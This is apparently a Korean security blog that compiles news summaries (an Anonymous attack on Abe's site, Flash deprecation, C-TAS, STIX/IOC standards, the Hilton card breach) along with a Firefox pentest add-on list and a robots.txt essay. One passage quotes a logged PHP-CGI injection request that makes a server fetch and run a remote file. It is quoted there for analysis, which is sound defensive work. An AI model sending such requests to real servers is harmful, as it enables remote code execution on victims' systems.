Infosec Ledger

아베 신조(安倍晋三) 일본 총리의 홈페이지(www.s-abe.or.jp)가 열람하기 어려운 상태가 된 가운데 국제 해커조직 어나니머스가 사이버 공격을 했을 수 있다는 가능성이 제기되고 있다. 현지 매체들에 따르면 일본 정부 대변인인 스가 요시히데(菅義偉) 관방장관은 10일 기자회견에서 어나니머스가 아베 총리 홈페이지에 대한 사이버 공격을 실시했음을 시사하는 범행 성명을 확인했다고 밝혔다. 

스가 장관은 "총리의 개인 홈페이지의 열람이 무척 어려운 상태가 됐다"며 "현 시점에서는 어나니머스의 공격으로 특정하지 않고 있지만 성명이 나왔다는 보고는 받았다"고 말했다. 스가 장관은 이어 "수사를 철저히 해 적절하게 대응하겠다"고 덧붙였다. 경시청에 따르면 이날 새벽 사이버 패트롤에서 장애가 발생한 것을 확인했으며 어나니머스를 자칭하는 트위터 계정에서 범행 성명이 확인됐다. 

어나니머스 추정 세력은 트위터 메시지에서 "고래는 문화적 권리에 속하지 않는다. 당신의 웹사이트는 탱고다운(tangodown·목표물 사살)됐다"고 했다. 또 반포경 메시지를 리트윗하고 고래고기를 먹지 말 것을 촉구했다.  

일본은 남극해 연례 고래 연구 조사선을 보냈다고 밝혔다. 하지만 반포경 단체에서는 포경 활동의 일환으로 보고 있다. 이와 관련해 어나니머스는 이달 초에 포경을 지속하고 있는 아이슬란드 정부의 웹사이트도 해킹했다고 주장했다.

출처 : http://news1.kr/articles/?2512412

보안 취약성 경고 문구 표시하며 HTML5 이용추천

보안 취약점 문제로 비난을 받아왔던 어도비 플래시가 머지않아 폐기될 전망이다. 플래시 개발업체 어도비도 사용자들에게 보안 취약성을 이유로 사용 중단을 권유하고 있기 때문이다.

어도비가 콘텐츠 개발자에게 플래시대신 HTML5와 같은 새로운 웹표준을 사용하도록 권고하고 있다고 더버지 등의 주요외신들이 1일(현지시간) 보도했다.

어도비 플래시는 인터넷 과부하 문제와 스마트폰 지원 부재로 10여년전부터 벼랑끝을 향해 달려왔다. 플래시는 당초 웹게임이나 애니메이션 개발툴로 크게 성공해 매년 수많은 사용자들이 이 프로그램을 다운로드해 사용하고 있다. 

하지만 플래시가 데스크톱의 컴퓨팅 자원을 잠식하고 노트북의 배터리 수명을 단축시키며 보안 취약점까지 드러나면서 플래시를 폐기해야 한다는 주장이 제기됐다. 플래시의 보안 취약점 문제가 해결될 조짐을 보이지 않자 애플은 스마트폰에서 플래시 사용을 금지했고 맥으로 이를 확대하고 있다. 아마존도 9월부터 광고 플랫폼에서 플래시를 차단하고 있다. 

지난 6월 페이스북 최고보안책임자(CSO)에 취임한 알렉스 사태모스도 플래시의 폐기를 주장했다. 그는 많은 플래시의 취약점을 보안 패치 업데이트로 감당하기 힘들 것으로 보고 어도비에 플래시의 폐기를 요청했다.

출처 : http://news.inews24.com/php/news_view.php?g_serial=931805&g_menu=020600

최근 한수원을 비롯하여 특정 국가 기관을 타겟으로 하는 APT 사이버공격이 지속적으로 발생하고 있다. 이에 대응하기 위해 국내에서는 2014년 8월부터 사이버 위협 정보 분석·공유시스템(C-TAS, Cyber Threat Analysis & Share)서비스를 운영하고 있다. C-TAS는 침해사고 정보 수집, 침해사고 종합 분석, 정보공유 3단계로 구분되며, 정보 제공을 해야 정보를 받아 볼 수 있는 구조이다. 보안기사에 의하면 현재는 KISA의 일방향적 정보공유의 성격이 강하며, 참여하고 있는 기업들의 정보 제공과 공유가 아직까지 완전한 대칭을 이루고 있지는 않다고 한다. 비록 위협을 받은 기업의 소중한 데이터들이 공개될 수 있기에 공유하기가 어렵겠지만, 대형 침해사고를 예방하기 위해서 신뢰성 있는 다양한 정보들이 수집되고 공유될 필요가 있다. 

위협정보 공유한다는 C-TAS, 얼마나 알고 있나요?

http://www.boannews.com/media/view.asp?idx=48763
C-TAS 사이버 위협정보 '신뢰성 확보 시급'

http://www.etnews.com/20151130000325

미국은 주요 기반 시설 보호 강화를 위한 사이버 보안 정책을 추진하고 있으며, 민·관 파트너십을 기반으로 한 사이버 위협정보 공유 체계를 구축하였다. 그러나 소니 영화사 해킹 사건을 계기로 오바마 대통령은 지난 2월 사이버 위협 정보통합센터(Cyber Threat Intelligence Integration Center, CTIIC) 설립을 승인하고, 민간 부문 사이버 위협 정보 공유 촉진을 골자로 한 행정명령(Executive Order, EO) 제13691호를 발표하였다. 또한, 미 상원과 하원 각 정보위원회에서는 연방정부와 민간 부문의 사이버 보안 및 위협 정보 공유에 관한 입법을 추진하고 있고, 얼마전 미 상원에서 압도적인 지지율로 '사이버보안 정보 공유에 관한 법률'이 통과되었다.
http://money.cnn.com/2015/10/27/technology/cisa-cybersecurity-information-sharing-act/index.html

미국과 중국, 사이버보안 협력체제를 위한 정보공유와 직통전화 설치

http://www.itworld.co.kr/news/96868
크라우드스트라이크(CrowdStrike) '사이버 침입 서비스 케이스북(Cyber Intrusion Services Casebook)' 발간

http://www.boannews.com/media/view.asp?idx=48764&kind=0

■ STIX(Structure Threat Information eXpression): 사이버 위협 정보 관련 표준

■ TAXII(Trusted Automated eXchange of Indicator Information):사이버 위협 정보 전송 규격

■ MAEC(Malware Attribute Enumeration and Characterization):악성코드 속성 정보 관련 표준

■ CybOX(Cyber Observables eXpression): 사이버 운영 오브젝트 관련 표준

■ MMDEF(Malware Metadata Exchange Format): 악성코드정보 공유 관련 표준

■ CVE(Common Vulnerabilities and Exposures): 공격 취약점 관련 표준

■ CPE(Common Platform Enumeration): 공격 타깃 플랫폼관련 표준
■ IOC(Indicators Of Compromised): 침해 지표

호스트나 네트워크 상에서 침해 혹은 감염을 식별할 수 있는 포렌식 아티팩트로서, 침해사고 탐지/분석 및 악성코드 행위분석이 주 목적이다. Fireeye의 홈페이지에서 제공하는 IOC Editor를 이용하여 손쉽게 IOC를 생성 할 수 있으며 md5, 파일명, 파일경로, 파일 크기, 파일 생성시간, IP, 레지스트리 등 다양한 정보를 포함한다. 국내ㆍ외 보안뉴스 모니터링을 하다보면 IOC를 공유하는 모습을 종종 볼 수있다.

TDrop2 Attacks Suggest Dark Seoul Attackers Return

http://researchcenter.paloaltonetworks.com/2015/11/tdrop2-attacks-suggest-dark-seoul-attackers-return/
[AhnLab]_Black_Mine_Operation.pdf 내용 中

http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=23706
http://boho.or.kr/upload/file/EpF903.pdf
http://secure360.org/wp-content/uploads/2014/05/Threat-Intelligence-Sharing-using-STIX-and-TAXII.pdf
https://www.fireeye.com/services/freeware/ioc-editor.html

GET index.php/?-d allow_url_include=On -d auto_prepend_file=http://netsunucum.com/status/-/d.txt

위 요청은 외부의 파일을 include, include_once, require, require_once 와 같은 파일로 include 허용시키고, http://netsunucum.com/status/-/d.txt 파일을 실행키려는 것이다.(index.php를 나중에 실행한다.)
http://netsunucum.com/status/-/d.txt 파일의 내용은 아래와 같다.

이미지 출처 : https://www.microsoft.com/ko-kr/events/windows10/IE.aspx#quick02

2016년 1월 12일, IE 지원정책에 변경으로 IE 하위버전에 대한 지원이 중단됩니다. 

Microsoft 지원주기 정책은 최소 5년 일반지원 그리고 비즈니스 및 개발자 제품과 Windows 운영체제에 대한 최소 5년의 추가 지원을 제공합니다. 2016년 1월 12일부터 아래 표에서 지원되는 운영체제와 IE브라우저의 조합에만 기술지원 및 보안업데이트를 제공합니다. 

Windows7 에서는 IE11만 기술지원 및 보안업데이트를 받게 되며, IE8, IE9, IE10의 경우 IE11로의 업그레이드가 필요합니다.

출처 : http://blog.alyac.co.kr/471

출처 : https://www.wireshark.org/docs/wsug_html_chunked/ChAppFilesConfigurationSection.html

The majority of the penetration testers are using the Mozilla Firefox as a web browser for their pentest activities.This article will introduce the firefox addons that can be used for a web application penetration test.

1) Firebug

It is useful for the debugging tools that can help you tracking rogue javascript code on servers.

2) User Agent Switcher

You can use this extension to change the user agent of your browser.Useful for web application penetration tests that you want to check and the mobile versions of the websites.

3) Hackbar

Useful for SQL injection and XSS attacks.It includes also tools for URL and HEX encoding/decoding and many more.

4) HttpFox

Monitor and analyze all the incoming and outgoing HTTP traffic between your browser and the web server.

5) Live HTTP Headers

View the HTTP headers of a website instantly.

6) Tamper Data

View and modify HTTP/HTTPS headers and post parameters.

7) ShowIP

Shows the IP of the current page in the status bar.It also includes information like the hostname,the ISP,the country and the city.

8) OSVDB

Open Source Vulnerability Database Search.

9) Packet Storm search plugin

Search the packet storm database for exploits,tools and advisories.

10) Offsec Exploit-db Search

Search the Exploit-db archive.

11) Security Focus Vulnerabilities Search Plugin

Search for vulnerabilities in the Security Focus

12) Cookie Watcher

Watch the selected cookie in the status bar.

13) Header Spy

Shows HTTP Headers on status bar

14) Groundspeed

Manipulate the application user interface.

15) CipherFox

Displays the current SSL/TLS cipher and certificate on the status bar.

16) XSS Me

Tool for testing reflected XSS vulnerabilities.

17) SQL Inject Me

Extension to test SQL Injection vulnerabilities.

18) Wappalyzer

Discover technologies and applications that are used on websites.

19) Poster

Make HTTP requests,interact with web services and watch the output.

20) Javascript Deobfuscator

Show the JavaScript code that are running on web pages.

21) Modify Headers

Modify HTTP request headers.

22) FoxyProxy

Advanced proxy management tool.

23) FlagFox

Displays a country flag for the location of the web server.It also includes tools such as Whois,Geotool,Ping,Alexa etc.

24) Greasemonkey

Customize the way a webpage behaves by using small bits of JavaScript.

25) Domain Details

Displays Server Type, Headers, IP Address, Location Flag, and links to Whois Reports.

26) Websecurify

Useful for security assessments in web applications.

27) XSSed Search

Search the cross-site scripting database at XSSed.Com

28) ViewStatePeeker

ASP.NET viewstate viewer.

29) CryptoFox

CryptoFox is an encryption/decryption tool for cracking MD5 passwords.

30) WorldIP

Location of the web server,IP,Datacenter,Ping,Traceroute,RDNS,AS etc.

31) Server Spy

Unveils the technology of the web server (Apache, IIS etc.)

32) Default Passwords

Search CIRT.net default password database.

33) Snort IDS Rule Search

Search for Snort IDS Rules.

출처 : http://www.hacoder.com/2015/10/firefox-addons-for-penetration-testing/

포스트리뷰중에 'robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가' 라는 주제로 얘기했던게 생각나서, 해킹과 보안 관점에서 robots.txt를 정리해봤다.

사진출처 : harcoder

robots.txt는 로봇 배제 표준(robots exclusion protocol)으로 알려진 규약으로서 해당 웹사이트에 대한 크롤링 지침을 전달하기 위한 용도로 사용된다. 쉽게 말해 접근 가능/불가능한 페이지, 디렉토리, 크롤러를 명시함으로서 크롤러를 제어 할 수있는 파일이다. 하지만 robots.txt 파일에 페이지, 디렉토리, 크롤러를 명시한다고 해도 접근이 불가능한 것은 아니다. 파일에 명시한 내용은 단순 '규약' 일뿐, 이를 어긴다고 문제가 될 건 없기 때문이다. 또한, 일반적인 웹 브라우저를 통해서 접근하는 클라이언트는 제어 할 수 없다.

민감한 정보를 포함하고 있는 'juicy'라는 페이지가 존재하고, 이 페이지의 경로는 관리자만 알고 있다고 가정해보자. 그럼 무차별 대입(Brute force)과 추측(Guessing) 방법 이외에는 이 페이지의 존재여부를 알 수 없을 것이다. 하지만 악의적 목적을 가진 해커가 robots.txt 파일에 접근하여 'juicy' 페이지가 Disallow로 설정 된 것을 확인한다면, 'juicy' 페이지에 흥미로운 정보가 있다고 추측 할 것이고, 해당 페이지에 접근하여 민감한 정보를 획득하려고 할 것이다. 하지만 접근제어 설정이 적용되어 있어서 'juicy' 페이지에 접근하지 못해도, 해커가 정보를 취할 수 있는 여지는 남아있다. 서버 운영자의 접근제어 설정 실수를 노리고 해당 페이지에 매일 접근 시도를 할 수도 있고, Disallow 설정이 되 있지만, 접근 제어 설정은 되 있지 않은 다른 페이지에 접근해서 주석처리 된 id/password를 운 좋게 획득할 수도 있다. 또한 robots.txt 파일의 내용을 통해 해당 서버의 디렉토리 구조도 어느 정도 파악하는 등 해커에게 정보를 제공할 수 있다. 이러한 이유 때문에 일부 취약점 스캐너들은 robots.txt 파일을 점검 항목에 포함한다. 아래 그림은 취약점 스캐너 Nikto의 점검 결과이다.

침해사고를 예방하기 위해 취약점 점검을 받으면 robots.txt 파일이 없기 때문에, 대형검색엔진의 크롤러 봇들에 의해 개인정보가 노출될 가능성이 있다는 진단 결과를 받을 수도 있다. 하지만 앞서 살펴 봤듯이 robots.txt는 누구나 접근가능하고, 해커에게 정보를 제공할 수도 있는 파일이므로 접근제어 설정과의 적절한 조화가 필요하다. 먼저 로봇 배제 표준보다 접근제어 설정이 우선시 되어야하며, 클라이언트에게 [403]Forbidden 페이지보다는 [404]Not Found 페이지를 보여주도록 함으로써, 해커에게 정보를 주지 않도록 한다. 또한, 로봇 배제 표준은 크롤러의 접근을 제어하는 것이 목적이므로, Disallow 설정보다 User-agent 설정을 우선시하여, Disallow 설정으로 보여지는 디렉토리와 페이지 정보를 최소화 해야한다.

이 글을 작성한 이유인 'robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가'에 대한 나의 주장은 '당연히 차단해야 한다' 였다. 하지만 스캐닝성으로 robots.txt 파일에 접근하는 모든 IP의 웹로그를 일일히 분석하여 차단 근거를 확인 할 수는 없으므로, 개발자와 서버 운영자들이 정보보안에 관심을 가지고 적극적으로 협조하려는 자세가 동시에 수반되어야 할 것이다.

참고
https://en.wikipedia.org/wiki/Robots_exclusion_standard#About_the_standard
http://www.hacoder.com/2015/10/what-exactly-is-robots-txt-file/

호텔 체인인 힐튼 월드와이드(Hilton Worldwide)는 2014년 말부터 2015년 중반까지 약 17주가 넘는 기간동안 자사의 카드 지불 시스템을 표적으로 한 악성코드를 확인하고 제거했다고 밝혔다.

Credit: Hilton Worldwide

힐튼 월드와이드는 공식 성명을 통해 이 악성코드는 고객들의 카드소지자 이름, 지불 카드 번호, 보안 코드, 그리고 카드 유효기간 등을 탈취했다고 말했다. 또한 자사의 고객들에게 자신이 승인하지 않은 내역이 있는지 자신의 지불카드 내역을 확인할 것을 경고했다.

힐튼은 예방 차원에서 고객들은 자신의 지불 카드 상태를 파악하고 모니터링을 원할 지 모른다. 2014년 11월 18일에서 2015년 5월 27일 17주 사이에 힐튼 월드와이드 호텔에서 지불 카드를 사용한 적이 있는 고객이라면 모두 해당한다"고 말했다.

힐튼 월드와이드는 2014년 기준으로 91개국에서 4,000여 개의 호텔, 67만 8,000여 개의 객실을 운영하고 있다. 힐튼 월드와이드는 힐튼이라는 브랜드를 갖고 있지 않는 다수의 호텔들을 운영하고 있다.

이 회사의 다른 브랜드는 엠버시 스위트 호텔(Embassy Suites Hotels), 더블트리(Doubletree), 큐리오(Curio), 햄튼 인 앤드 스위트(Hampton Inn & Suites), 홈우드 스위트(Homewood Suites), 홈 2 슈트(Home 2 Suites), 콘래드 호텔 앤드 리조트(Conrad Hotels & Resorts), 그리고 월도프-아스토리아 호텔 앤드 리조트(The Waldorf-Astoria Hotels & Resorts) 등이 있다.

힐튼은 지난 9월 컴퓨터 시스템의 해킹 가능성을 조사하고 있다고 밝힌 바 있다.

최근 해커에게 표적이 된 것은 이 호텔 체인만이 아니다. 지난 주말 스타우드 호텔 앤드 리조트 월드와이드(Starwood Hotels & Resorts Worldwide)는 자사의 북미 지역 일부 호텔들이 악성코드에 표적이 되어 고객 지불 카드 내역이 도난당했다고 밝힌 바 있다.

그러나 이 악성코드가 힐튼호텔에서 고객 정보를 훔친 악성코드와 동일한 것인지는 확실치 않다. 스타우드 사건에서 정보 유출 기간은 2014년 11월 7일부터 2015년 6월 30일까지였다. editor@itworld.co.kr

출처 : http://www.ciokorea.com/news/27529

WordPress가 새로운 유저 인터페이스를 선보인다. 칼립소(Calypso)라는 새로운 UI는 기존에 쓰던 PHP가 아닌 자바스크립트로 이루어져 있으며, 페이스북이 개발한 React라는 프레임워크로 프론트엔드를 구성하였다. 서버는 Node.js 기반으로 만들어졌다.

tN 인사이트: 한때는 ‘우스운 언어’로 여겨졌던 자바스크립트이지만, Node.js 프레임워크의 등장으로 하나의 언어를 서버와 클라이언트 모두에 사용할 수 있게 되면서 이제 더 많은 소프트웨어 회사들이 사용하고 있다. 최근 실리콘밸리에서 새로 만드는 서비스는 거의 예외 없이 자바스크립트 위주로 쓰고 있다. 자바스크립트를 써서 반응형(responsive)으로 잘 만들어두면 모바일 대응이 쉽다는 것도 장점이다. PHP, Ruby 등도 여전히 강력한 언어이지만, 웹의 미래는 자바스크립트가 가져가게 될 것 같다.

참고 기사: Wired, WordPress
출처 : http://techneedle.com/archives/23839

* 개인적인 소견 : 워드프레스의 변화는 사용자의 편의는 물론이고, 다양하게 발생하는 워드프레스 취약점에서 벗어나려는 의도도 포함하고 있다고 생각한다.